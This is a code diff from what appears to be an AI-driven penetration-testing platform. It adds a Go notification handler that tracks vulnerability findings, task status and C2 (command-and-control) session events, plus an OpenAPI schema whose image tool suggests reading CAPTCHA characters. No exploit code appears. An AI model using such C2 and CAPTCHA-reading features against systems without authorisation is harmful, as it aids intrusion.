strconv.FormatInt(t.CompletedAt.Unix(), 10), + Level: "p2", + Type: "task_completed", + Title: i18nText(english, "任务完成", "Task Completed"), + Desc: i18nText(english, "会话 "+t.ConversationID+" 已完成", "Conversation "+t.ConversationID+" completed"), + Ts: t.CompletedAt.UTC().Format(time.RFC3339), + Count: 1, + Actionable: false, + Read: false, + ConversationID: t.ConversationID, + }) + if len(items) >= limit { + break + } + } + } + return items, len(items) +} + +func buildPlaceholders(n int) string { + if n <= 0 { + return "" + } + out := make([]string, 0, n) + for i := 0; i < n; i++ { + out = append(out, "?") + } + return strings.Join(out, ",") +} + +func (h *NotificationHandler) readStatesByIDs(ids []string) (map[string]bool, error) { + result := make(map[string]bool, len(ids)) + if len(ids) == 0 { + return result, nil + } + holders := buildPlaceholders(len(ids)) + query := "SELECT event_id FROM notification_reads WHERE event_id IN (" + holders + ")" + args := make([]interface{}, 0, len(ids)) + for _, id := range ids { + args = append(args, id) + } + rows, err := h.db.Query(query, args...) + if err != nil { + return result, err + } + defer rows.Close() + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + continue + } + result[id] = true + } + return result, nil +} + +func (h *NotificationHandler) applyReadStates(items []NotificationSummaryItem) ([]NotificationSummaryItem, error) { + markableIDs := make([]string, 0, len(items)) + for _, item := range items { + if item.Actionable { + continue + } + markableIDs = append(markableIDs, item.ID) + } + readMap, err := h.readStatesByIDs(markableIDs) + if err != nil { + return items, err + } + for i := range items { + if items[i].Actionable { + items[i].Read = false + continue + } + items[i].Read = readMap[items[i].ID] + } + return items, nil +} + +func filterVisibleItems(items []NotificationSummaryItem) []NotificationSummaryItem { + out := make([]NotificationSummaryItem, 0, len(items)) + for _, item := range items { + if item.Actionable || !item.Read { + out = append(out, item) + } + } + return out +} + +func countP0(items []NotificationSummaryItem) int { + total := 0 + for _, item := range items { + if item.Level == "p0" { + if item.Count > 0 { + total += item.Count + } else { + total++ + } + } + } + return total +} + +func countUnread(items []NotificationSummaryItem) int { + total := 0 + for _, item := range items { + if item.Actionable || !item.Read { + if item.Count > 0 { + total += item.Count + } else { + total++ + } + } + } + return total +} + +func createNotificationReadTableIfNeeded(db *database.DB) error { + if db == nil { + return fmt.Errorf("db is nil") + } + _, err := db.Exec(` + CREATE TABLE IF NOT EXISTS notification_reads ( + event_id TEXT PRIMARY KEY, + read_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP + ); + `) + if err != nil { + return err + } + _, idxErr := db.Exec(`CREATE INDEX IF NOT EXISTS idx_notification_reads_read_at ON notification_reads(read_at DESC);`) + return idxErr +} + +func pruneNotificationReads(db *database.DB, maxRows int) error { + if db == nil { + return fmt.Errorf("db is nil") + } + if maxRows <= 0 { + return nil + } + _, err := db.Exec(` + DELETE FROM notification_reads + WHERE event_id NOT IN ( + SELECT event_id + FROM notification_reads + ORDER BY read_at DESC, rowid DESC + LIMIT ? + ) + `, maxRows) + return err +} + +type markReadRequest struct { + EventIDs []string `json:"eventIds"` +} + +func normalizeMarkableEventID(id string) (string, bool) { + v := strings.TrimSpace(id) + if v == "" { + return "", false + } + // 仅允许“可读后隐藏”的信息类事件;Actionable 事件不参与 read 标记。 + allowedPrefixes := []string{ + "vuln:", + "exec_failed:", + "task_completed:", + "c2evt:", + } + for _, prefix := range allowedPrefixes { + if strings.HasPrefix(v, prefix) { + return v, true + } + } + return "", false +} + +// MarkRead 按事件 ID 标记已读 +func (h *NotificationHandler) MarkRead(c *gin.Context) { + if err := createNotificationReadTableIfNeeded(h.db); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to prepare notification read table"}) + return + } + var req markReadRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "invalid request body"}) + return + } + if len(req.EventIDs) == 0 { + c.JSON(http.StatusOK, gin.H{"ok": true, "marked": 0}) + return + } + tx, err := h.db.Begin() + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to begin transaction"}) + return + } + defer func() { + _ = tx.Rollback() + }() + stmt, err := tx.Prepare(` + INSERT INTO notification_reads(event_id, read_at) + VALUES(?, CURRENT_TIMESTAMP) + ON CONFLICT(event_id) DO UPDATE SET read_at = CURRENT_TIMESTAMP + `) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to prepare statement"}) + return + } + defer stmt.Close() + marked := 0 + for _, raw := range req.EventIDs { + id, ok := normalizeMarkableEventID(raw) + if !ok { + continue + } + if _, err := stmt.Exec(id); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to mark read"}) + return + } + marked++ + } + if err := tx.Commit(); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to commit read marks"}) + return + } + if err := pruneNotificationReads(h.db, notificationReadMaxRows); err != nil { + h.logger.Warn("裁剪通知已读记录失败", zap.Error(err)) + } + c.JSON(http.StatusOK, gin.H{"ok": true, "marked": marked}) +} + +// GetSummary 返回通知聚合视图(用于头部铃铛) +func (h *NotificationHandler) GetSummary(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"}) + return + } + + if err := createNotificationReadTableIfNeeded(h.db); err != nil { + h.logger.Warn("初始化通知已读表失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to initialize notification read table"}) + return + } + + english := requestWantsEnglish(c) + sinceMs := normalizeSinceMs(parseSinceMs(c.Query("since"))) + limit, _ := strconv.Atoi(strings.TrimSpace(c.DefaultQuery("limit", "50"))) + if limit <= 0 { + limit = 50 + } + if limit > 200 { + limit = 200 + } + + hitlItems, err := h.loadPendingHITLItems(limit, english) + if err != nil { + h.logger.Warn("加载 HITL 通知失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize hitl notifications"}) + return + } + + vulnItems, vulnCounts, err := h.loadVulnerabilityItems(sinceMs, limit, english) + if err != nil { + h.logger.Warn("加载漏洞通知失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize vulnerabilities"}) + return + } + + c2OnlineItems, c2OnlineCount, err := h.loadC2SessionOnlineEvents(sinceMs, limit, english) + if err != nil { + h.logger.Warn("加载 C2 会话上线通知失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize c2 session events"}) + return + } + + longRunningItems, longRunningCount := h.summarizeLongRunningTasks(15*time.Minute, english) + completedItems, completedCount := h.summarizeCompletedTasksSince(sinceMs, limit, english) + + items := make([]NotificationSummaryItem, 0, len(hitlItems)+len(vulnItems)+len(c2OnlineItems)+len(longRunningItems)+len(completedItems)) + items = append(items, hitlItems...) + items = append(items, vulnItems...) + items = append(items, c2OnlineItems...) + items = append(items, longRunningItems...) + items = append(items, completedItems...) + + items, err = h.applyReadStates(items) + if err != nil { + h.logger.Warn("加载通知已读状态失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to load notification read states"}) + return + } + items = filterVisibleItems(items) + + sort.Slice(items, func(i, j int) bool { + ti, errI := time.Parse(time.RFC3339, items[i].Ts) + tj, errJ := time.Parse(time.RFC3339, items[j].Ts) + if errI != nil || errJ != nil { + return i < j + } + return ti.After(tj) + }) + + p0Count := countP0(items) + unreadCount := countUnread(items) + c.JSON(http.StatusOK, NotificationSummaryResponse{ + SinceMs: sinceMs, + GeneratedAt: time.Now().UTC().Format(time.RFC3339), + P0Count: p0Count, + UnreadCount: unreadCount, + Counts: map[string]int{ + "hitlPending": len(hitlItems), + "newCriticalVulns": vulnCounts["newCriticalVulns"], + "newHighVulns": vulnCounts["newHighVulns"], + "newMediumVulns": vulnCounts["newMediumVulns"], + "newLowVulns": vulnCounts["newLowVulns"], + "newInfoVulns": vulnCounts["newInfoVulns"], + "failedExecutions": 0, + "longRunningTasks": longRunningCount, + "completedTasks": completedCount, + "c2SessionOnline": c2OnlineCount, + }, + Items: items, + }) +} diff --git a/internal/handler/openapi.go b/internal/handler/openapi.go new file mode 100644 index 00000000..7a7a19f6 --- /dev/null +++ b/internal/handler/openapi.go @@ -0,0 +1,6364 @@ +package handler + +import ( + "net/http" + + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// OpenAPIHandler OpenAPI处理器 +type OpenAPIHandler struct { + db *database.DB + logger *zap.Logger + conversationHdlr *ConversationHandler + agentHdlr *AgentHandler +} + +// NewOpenAPIHandler 创建新的OpenAPI处理器 +func NewOpenAPIHandler(db *database.DB, logger *zap.Logger, conversationHdlr *ConversationHandler, agentHdlr *AgentHandler) *OpenAPIHandler { + return &OpenAPIHandler{ + db: db, + logger: logger, + conversationHdlr: conversationHdlr, + agentHdlr: agentHdlr, + } +} + +// GetOpenAPISpec 获取OpenAPI规范 +func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) { + host := c.Request.Host + scheme := "http" + if c.Request.TLS != nil { + scheme = "https" + } + + spec := map[string]interface{}{ + "openapi": "3.0.0", + "info": map[string]interface{}{ + "title": "CyberStrikeAI API", + "description": "AI驱动的自动化安全测试平台API文档", + "version": "1.0.0", + "contact": map[string]interface{}{ + "name": "CyberStrikeAI", + }, + }, + "servers": []map[string]interface{}{ + { + "url": scheme + "://" + host, + "description": "当前服务器", + }, + }, + "components": map[string]interface{}{ + "securitySchemes": map[string]interface{}{ + "bearerAuth": map[string]interface{}{ + "type": "http", + "scheme": "bearer", + "bearerFormat": "JWT", + "description": "使用Bearer Token进行认证。Token通过 /api/auth/login 接口获取。", + }, + }, + "schemas": map[string]interface{}{ + "CreateConversationRequest": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "title": map[string]interface{}{ + "type": "string", + "description": "对话标题", + "example": "Web应用安全测试", + }, + "projectId": map[string]interface{}{ + "type": "string", + "description": "绑定的项目 ID(可选,共享事实黑板)", + }, + }, + }, + "SetConversationProjectRequest": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "projectId": map[string]interface{}{ + "type": "string", + "description": "项目 ID;空字符串表示解除绑定", + }, + }, + "required": []string{"projectId"}, + }, + "Conversation": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "对话ID", + "example": "550e8400-e29b-41d4-a716-446655440000", + }, + "title": map[string]interface{}{ + "type": "string", + "description": "对话标题", + "example": "Web应用安全测试", + }, + "createdAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "创建时间", + }, + "updatedAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "更新时间", + }, + "projectId": map[string]interface{}{ + "type": "string", + "description": "绑定的项目 ID(可选)", + }, + }, + }, + "ConversationDetail": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "title": map[string]interface{}{ + "type": "string", + "description": "对话标题", + }, + "status": map[string]interface{}{ + "type": "string", + "description": "对话状态:active(进行中)、completed(已完成)、failed(失败)", + "enum": []string{"active", "completed", "failed"}, + }, + "createdAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "创建时间", + }, + "updatedAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "更新时间", + }, + "messages": map[string]interface{}{ + "type": "array", + "description": "消息列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Message", + }, + }, + "messageCount": map[string]interface{}{ + "type": "integer", + "description": "消息数量", + }, + }, + }, + "Message": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "消息ID", + }, + "conversationId": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "role": map[string]interface{}{ + "type": "string", + "description": "消息角色:user(用户)、assistant(助手)", + "enum": []string{"user", "assistant"}, + }, + "content": map[string]interface{}{ + "type": "string", + "description": "消息内容", + }, + "createdAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "创建时间", + }, + }, + }, + "ConversationResults": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "conversationId": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "messages": map[string]interface{}{ + "type": "array", + "description": "消息列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Message", + }, + }, + "vulnerabilities": map[string]interface{}{ + "type": "array", + "description": "发现的漏洞列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Vulnerability", + }, + }, + "executionResults": map[string]interface{}{ + "type": "array", + "description": "执行结果列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/ExecutionResult", + }, + }, + }, + }, + "Vulnerability": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "漏洞ID", + }, + "title": map[string]interface{}{ + "type": "string", + "description": "漏洞标题", + }, + "description": map[string]interface{}{ + "type": "string", + "description": "漏洞描述", + }, + "severity": map[string]interface{}{ + "type": "string", + "description": "严重程度", + "enum": []string{"critical", "high", "medium", "low", "info"}, + }, + "status": map[string]interface{}{ + "type": "string", + "description": "状态", + "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"}, + }, + "target": map[string]interface{}{ + "type": "string", + "description": "受影响的目标", + }, + }, + }, + "ExecutionResult": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "执行ID", + }, + "toolName": map[string]interface{}{ + "type": "string", + "description": "工具名称", + }, + "status": map[string]interface{}{ + "type": "string", + "description": "执行状态", + "enum": []string{"success", "failed", "running"}, + }, + "result": map[string]interface{}{ + "type": "string", + "description": "执行结果", + }, + "createdAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "创建时间", + }, + }, + }, + "Error": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "error": map[string]interface{}{ + "type": "string", + "description": "错误信息", + }, + }, + }, + "LoginRequest": map[string]interface{}{ + "type": "object", + "required": []string{"password"}, + "properties": map[string]interface{}{ + "password": map[string]interface{}{ + "type": "string", + "description": "登录密码", + }, + }, + }, + "LoginResponse": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "token": map[string]interface{}{ + "type": "string", + "description": "认证Token", + }, + "expires_at": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "Token过期时间", + }, + "session_duration_hr": map[string]interface{}{ + "type": "integer", + "description": "会话持续时间(小时)", + }, + }, + }, + "ChangePasswordRequest": map[string]interface{}{ + "type": "object", + "required": []string{"oldPassword", "newPassword"}, + "properties": map[string]interface{}{ + "oldPassword": map[string]interface{}{ + "type": "string", + "description": "当前密码", + }, + "newPassword": map[string]interface{}{ + "type": "string", + "description": "新密码(至少8位)", + }, + }, + }, + "UpdateConversationRequest": map[string]interface{}{ + "type": "object", + "required": []string{"title"}, + "properties": map[string]interface{}{ + "title": map[string]interface{}{ + "type": "string", + "description": "对话标题", + }, + }, + }, + "Group": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "分组ID", + }, + "name": map[string]interface{}{ + "type": "string", + "description": "分组名称", + }, + "icon": map[string]interface{}{ + "type": "string", + "description": "分组图标", + }, + "createdAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "创建时间", + }, + "updatedAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "更新时间", + }, + }, + }, + "CreateGroupRequest": map[string]interface{}{ + "type": "object", + "required": []string{"name"}, + "properties": map[string]interface{}{ + "name": map[string]interface{}{ + "type": "string", + "description": "分组名称", + }, + "icon": map[string]interface{}{ + "type": "string", + "description": "分组图标(可选)", + }, + }, + }, + "UpdateGroupRequest": map[string]interface{}{ + "type": "object", + "required": []string{"name"}, + "properties": map[string]interface{}{ + "name": map[string]interface{}{ + "type": "string", + "description": "分组名称", + }, + "icon": map[string]interface{}{ + "type": "string", + "description": "分组图标", + }, + }, + }, + "AddConversationToGroupRequest": map[string]interface{}{ + "type": "object", + "required": []string{"conversationId", "groupId"}, + "properties": map[string]interface{}{ + "conversationId": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "groupId": map[string]interface{}{ + "type": "string", + "description": "分组ID", + }, + }, + }, + "BatchTaskRequest": map[string]interface{}{ + "type": "object", + "required": []string{"tasks"}, + "properties": map[string]interface{}{ + "title": map[string]interface{}{ + "type": "string", + "description": "任务标题(可选)", + }, + "tasks": map[string]interface{}{ + "type": "array", + "description": "任务列表,每行一个任务", + "items": map[string]interface{}{ + "type": "string", + }, + }, + "role": map[string]interface{}{ + "type": "string", + "description": "角色名称(可选)", + }, + "agentMode": map[string]interface{}{ + "type": "string", + "description": "代理模式:eino_single(Eino ADK 单代理,默认)| deep | plan_execute | supervisor", + "enum": []string{"eino_single", "deep", "plan_execute", "supervisor"}, + }, + "scheduleMode": map[string]interface{}{ + "type": "string", + "description": "调度方式(manual | cron)", + "enum": []string{"manual", "cron"}, + }, + "cronExpr": map[string]interface{}{ + "type": "string", + "description": "Cron 表达式(scheduleMode=cron 时必填)", + }, + "executeNow": map[string]interface{}{ + "type": "boolean", + "description": "是否创建后立即执行(默认 false)", + }, + }, + }, + "BatchQueue": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "队列ID", + }, + "title": map[string]interface{}{ + "type": "string", + "description": "队列标题", + }, + "status": map[string]interface{}{ + "type": "string", + "description": "队列状态", + "enum": []string{"pending", "running", "paused", "completed", "failed"}, + }, + "tasks": map[string]interface{}{ + "type": "array", + "description": "任务列表", + "items": map[string]interface{}{ + "type": "object", + }, + }, + "createdAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "创建时间", + }, + }, + }, + "CancelAgentLoopRequest": map[string]interface{}{ + "type": "object", + "required": []string{"conversationId"}, + "properties": map[string]interface{}{ + "conversationId": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "reason": map[string]interface{}{ + "type": "string", + "description": "可选。与 MCP 监控页「终止并说明」一致:非空时合并进当前工具返回给模型的文本(含 USER INTERRUPT NOTE 块)", + }, + "continueAfter": map[string]interface{}{ + "type": "boolean", + "description": "为 true 时仅终止当前进行中的 MCP 工具调用(不取消整轮任务);须已有工具在执行,否则 400", + }, + }, + }, + "AgentTask": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "conversationId": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "status": map[string]interface{}{ + "type": "string", + "description": "任务状态", + "enum": []string{"running", "completed", "failed", "cancelled", "timeout"}, + }, + "startedAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "开始时间", + }, + }, + }, + "CreateVulnerabilityRequest": map[string]interface{}{ + "type": "object", + "required": []string{"conversation_id", "title", "severity"}, + "properties": map[string]interface{}{ + "conversation_id": map[string]interface{}{ + "type": "string", + "description": "对话ID", + }, + "title": map[string]interface{}{ + "type": "string", + "description": "漏洞标题", + }, + "description": map[string]interface{}{ + "type": "string", + "description": "漏洞描述", + }, + "severity": map[string]interface{}{ + "type": "string", + "description": "严重程度", + "enum": []string{"critical", "high", "medium", "low", "info"}, + }, + "status": map[string]interface{}{ + "type": "string", + "description": "状态", + "enum": []string{"open", "closed", "fixed"}, + }, + "type": map[string]interface{}{ + "type": "string", + "description": "漏洞类型", + }, + "target": map[string]interface{}{ + "type": "string", + "description": "受影响的目标", + }, + "proof": map[string]interface{}{ + "type": "string", + "description": "漏洞证明", + }, + "impact": map[string]interface{}{ + "type": "string", + "description": "影响", + }, + "recommendation": map[string]interface{}{ + "type": "string", + "description": "修复建议", + }, + }, + }, + "UpdateVulnerabilityRequest": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "title": map[string]interface{}{ + "type": "string", + "description": "漏洞标题", + }, + "description": map[string]interface{}{ + "type": "string", + "description": "漏洞描述", + }, + "severity": map[string]interface{}{ + "type": "string", + "description": "严重程度", + "enum": []string{"critical", "high", "medium", "low", "info"}, + }, + "status": map[string]interface{}{ + "type": "string", + "description": "状态", + "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"}, + }, + "type": map[string]interface{}{ + "type": "string", + "description": "漏洞类型", + }, + "target": map[string]interface{}{ + "type": "string", + "description": "受影响的目标", + }, + "proof": map[string]interface{}{ + "type": "string", + "description": "漏洞证明", + }, + "impact": map[string]interface{}{ + "type": "string", + "description": "影响", + }, + "recommendation": map[string]interface{}{ + "type": "string", + "description": "修复建议", + }, + }, + }, + "ListVulnerabilitiesResponse": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "vulnerabilities": map[string]interface{}{ + "type": "array", + "description": "漏洞列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Vulnerability", + }, + }, + "total": map[string]interface{}{ + "type": "integer", + "description": "总数", + }, + "page": map[string]interface{}{ + "type": "integer", + "description": "当前页", + }, + "page_size": map[string]interface{}{ + "type": "integer", + "description": "每页数量", + }, + "total_pages": map[string]interface{}{ + "type": "integer", + "description": "总页数", + }, + }, + }, + "VulnerabilityStats": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "total": map[string]interface{}{ + "type": "integer", + "description": "总漏洞数", + }, + "by_severity": map[string]interface{}{ + "type": "object", + "description": "按严重程度统计", + }, + "by_status": map[string]interface{}{ + "type": "object", + "description": "按状态统计", + }, + }, + }, + "RoleConfig": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "name": map[string]interface{}{ + "type": "string", + "description": "角色名称", + }, + "description": map[string]interface{}{ + "type": "string", + "description": "角色描述", + }, + "enabled": map[string]interface{}{ + "type": "boolean", + "description": "是否启用", + }, + "systemPrompt": map[string]interface{}{ + "type": "string", + "description": "系统提示词", + }, + "userPrompt": map[string]interface{}{ + "type": "string", + "description": "用户提示词", + }, + "tools": map[string]interface{}{ + "type": "array", + "description": "工具列表", + "items": map[string]interface{}{ + "type": "string", + }, + }, + }, + }, + "Skill": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "name": map[string]interface{}{ + "type": "string", + "description": "Skill名称", + }, + "description": map[string]interface{}{ + "type": "string", + "description": "Skill描述", + }, + "path": map[string]interface{}{ + "type": "string", + "description": "Skill路径", + }, + }, + }, + "CreateSkillRequest": map[string]interface{}{ + "type": "object", + "required": []string{"name", "description"}, + "properties": map[string]interface{}{ + "name": map[string]interface{}{ + "type": "string", + "description": "Skill名称", + }, + "description": map[string]interface{}{ + "type": "string", + "description": "Skill描述", + }, + }, + }, + "UpdateSkillRequest": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "description": map[string]interface{}{ + "type": "string", + "description": "Skill描述", + }, + }, + }, + "ToolExecution": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "type": "string", + "description": "执行ID", + }, + "toolName": map[string]interface{}{ + "type": "string", + "description": "工具名称", + }, + "status": map[string]interface{}{ + "type": "string", + "description": "执行状态", + "enum": []string{"success", "failed", "running"}, + }, + "createdAt": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "创建时间", + }, + }, + }, + "MonitorResponse": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "executions": map[string]interface{}{ + "type": "array", + "description": "执行记录列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/ToolExecution", + }, + }, + "stats": map[string]interface{}{ + "type": "object", + "description": "统计信息", + }, + "timestamp": map[string]interface{}{ + "type": "string", + "format": "date-time", + "description": "时间戳", + }, + "total": map[string]interface{}{ + "type": "integer", + "description": "总数", + }, + "page": map[string]interface{}{ + "type": "integer", + "description": "当前页", + }, + "page_size": map[string]interface{}{ + "type": "integer", + "description": "每页数量", + }, + "total_pages": map[string]interface{}{ + "type": "integer", + "description": "总页数", + }, + }, + }, + "ConfigResponse": map[string]interface{}{ + "type": "object", + "description": "配置信息(含 openai、vision、multi_agent 等)", + "properties": map[string]interface{}{ + "vision": map[string]interface{}{ + "$ref": "#/components/schemas/VisionConfig", + }, + }, + }, + "UpdateConfigRequest": map[string]interface{}{ + "type": "object", + "description": "更新配置请求", + "properties": map[string]interface{}{ + "vision": map[string]interface{}{ + "$ref": "#/components/schemas/VisionConfig", + }, + }, + }, + "VisionConfig": map[string]interface{}{ + "type": "object", + "description": "视觉分析(analyze_image MCP 工具);enabled 且 model 非空时注册工具", + "properties": map[string]interface{}{ + "enabled": map[string]interface{}{"type": "boolean", "description": "是否启用 analyze_image"}, + "model": map[string]interface{}{"type": "string", "description": "视觉模型名(必填)", "example": "qwen-vl-max"}, + "api_key": map[string]interface{}{"type": "string", "description": "API Key;留空复用 openai.api_key"}, + "base_url": map[string]interface{}{"type": "string", "description": "Base URL;留空复用 openai.base_url"}, + "provider": map[string]interface{}{"type": "string", "description": "提供商;留空复用 openai.provider"}, + "timeout_seconds": map[string]interface{}{"type": "integer", "description": "VL 调用超时(秒)"}, + "max_image_bytes": map[string]interface{}{"type": "integer", "description": "原始文件大小上限(字节)"}, + "max_dimension": map[string]interface{}{"type": "integer", "description": "长边缩放像素"}, + "jpeg_quality": map[string]interface{}{"type": "integer", "description": "JPEG 质量 60-100"}, + "max_payload_bytes": map[string]interface{}{"type": "integer", "description": "送 API 体积上限(字节)"}, + "skip_preprocess_below_bytes": map[string]interface{}{"type": "integer", "description": "低于该字节且尺寸合规时可原图直传;0=始终压缩"}, + "detail": map[string]interface{}{"type": "string", "enum": []string{"low", "high", "auto"}, "description": "OpenAI 兼容 image detail"}, + }, + }, + "AnalyzeImageToolCall": map[string]interface{}{ + "type": "object", + "description": "内置 MCP 工具 analyze_image:分析服务器本地图片,返回纯文本(验证码/UI/报错等)", + "properties": map[string]interface{}{ + "path": map[string]interface{}{ + "type": "string", + "description": "图片绝对路径或相对于进程工作目录的路径", + }, + "question": map[string]interface{}{ + "type": "string", + "description": "可选:重点问题;验证码建议「只输出验证码字符」", + }, + }, + "required": []string{"path"}, + }, + "ExternalMCPConfig": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "enabled": map[string]interface{}{ + "type": "boolean", + "description": "是否启用", + }, + "command": map[string]interface{}{ + "type": "string", + "description": "命令", + }, + "args": map[string]interface{}{ + "type": "array", + "description": "参数列表", + "items": map[string]interface{}{ + "type": "string", + }, + }, + }, + }, + "ExternalMCPResponse": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "config": map[string]interface{}{ + "$ref": "#/components/schemas/ExternalMCPConfig", + }, + "status": map[string]interface{}{ + "type": "string", + "description": "状态", + "enum": []string{"connected", "disconnected", "error", "disabled"}, + }, + "toolCount": map[string]interface{}{ + "type": "integer", + "description": "工具数量", + }, + "error": map[string]interface{}{ + "type": "string", + "description": "错误信息", + }, + }, + }, + "AddOrUpdateExternalMCPRequest": map[string]interface{}{ + "type": "object", + "required": []string{"config"}, + "properties": map[string]interface{}{ + "config": map[string]interface{}{ + "$ref": "#/components/schemas/ExternalMCPConfig", + }, + }, + }, + "AttackChain": map[string]interface{}{ + "type": "object", + "description": "攻击链数据", + }, + "MCPMessage": map[string]interface{}{ + "type": "object", + "description": "MCP消息(符合JSON-RPC 2.0规范)", + "required": []string{"jsonrpc"}, + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "description": "消息ID,可以是字符串、数字或null。对于请求,必须提供;对于通知,可以省略", + "oneOf": []map[string]interface{}{ + {"type": "string"}, + {"type": "number"}, + {"type": "null"}, + }, + "example": "550e8400-e29b-41d4-a716-446655440000", + }, + "method": map[string]interface{}{ + "type": "string", + "description": "方法名。支持的方法:\n- `initialize`: 初始化MCP连接\n- `tools/list`: 列出所有可用工具\n- `tools/call`: 调用工具\n- `prompts/list`: 列出所有提示词模板\n- `prompts/get`: 获取提示词模板\n- `resources/list`: 列出所有资源\n- `resources/read`: 读取资源内容\n- `sampling/request`: 采样请求", + "enum": []string{ + "initialize", + "tools/list", + "tools/call", + "prompts/list", + "prompts/get", + "resources/list", + "resources/read", + "sampling/request", + }, + "example": "tools/list", + }, + "params": map[string]interface{}{ + "description": "方法参数(JSON对象),根据不同的method有不同的结构", + "type": "object", + }, + "jsonrpc": map[string]interface{}{ + "type": "string", + "description": "JSON-RPC版本,固定为\"2.0\"", + "enum": []string{"2.0"}, + "example": "2.0", + }, + }, + }, + "MCPInitializeParams": map[string]interface{}{ + "type": "object", + "required": []string{"protocolVersion", "capabilities", "clientInfo"}, + "properties": map[string]interface{}{ + "protocolVersion": map[string]interface{}{ + "type": "string", + "description": "协议版本", + "example": "2024-11-05", + }, + "capabilities": map[string]interface{}{ + "type": "object", + "description": "客户端能力", + }, + "clientInfo": map[string]interface{}{ + "type": "object", + "required": []string{"name", "version"}, + "properties": map[string]interface{}{ + "name": map[string]interface{}{ + "type": "string", + "description": "客户端名称", + "example": "MyClient", + }, + "version": map[string]interface{}{ + "type": "string", + "description": "客户端版本", + "example": "1.0.0", + }, + }, + }, + }, + }, + "MCPCallToolParams": map[string]interface{}{ + "type": "object", + "required": []string{"name", "arguments"}, + "properties": map[string]interface{}{ + "name": map[string]interface{}{ + "type": "string", + "description": "工具名称", + "example": "nmap", + }, + "arguments": map[string]interface{}{ + "type": "object", + "description": "工具参数(键值对),具体参数取决于工具定义", + "example": map[string]interface{}{ + "target": "192.168.1.1", + "ports": "80,443", + }, + }, + }, + }, + "MCPResponse": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "id": map[string]interface{}{ + "description": "消息ID(与请求中的id相同)", + "oneOf": []map[string]interface{}{ + {"type": "string"}, + {"type": "number"}, + {"type": "null"}, + }, + }, + "result": map[string]interface{}{ + "description": "方法执行结果(JSON对象),结构取决于调用的方法", + "type": "object", + }, + "error": map[string]interface{}{ + "type": "object", + "description": 